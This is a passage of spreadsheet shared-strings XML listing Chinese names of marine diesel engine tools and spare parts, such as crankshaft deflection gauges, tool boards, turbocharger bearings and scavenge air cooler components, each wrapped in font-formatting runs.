        <charset val="134"/>
      </rPr>
      <t>曲轴甩档测量工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修服务工具车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴甩档测量工具说明书</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塑料软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公快速接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接长接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缩径块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环扩张器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力计固定</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起吊布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带环六角螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆除工具中间块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打磨台平板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打磨台销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打磨台螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>901</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>902</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>904</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>905</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>906</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>908</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>909</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>910</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>912</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>901</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>902</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>904</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>905</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>906</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>908</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>909</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>910</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>912</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减速齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑安装螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护支架板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑定距管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距连接内板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距连接外板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉形定距块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建议保护板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护帽管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护帽盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压张紧螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器支柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>继电器模块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑锲块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端锲形螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体对齐安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>啮合部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不明数据信息</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封空气垫料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器护套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝热</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴环叶片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴颈轴承壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚球轴承衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>棘爪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴环清洗法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴颈毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预转子毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子叶片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振拉筋</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器详细资料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向室</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管板换向室</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空冷器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器端盖垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向室垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机外轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气瓶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>鼓风机壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离器单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油分离器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞滑阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁止臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
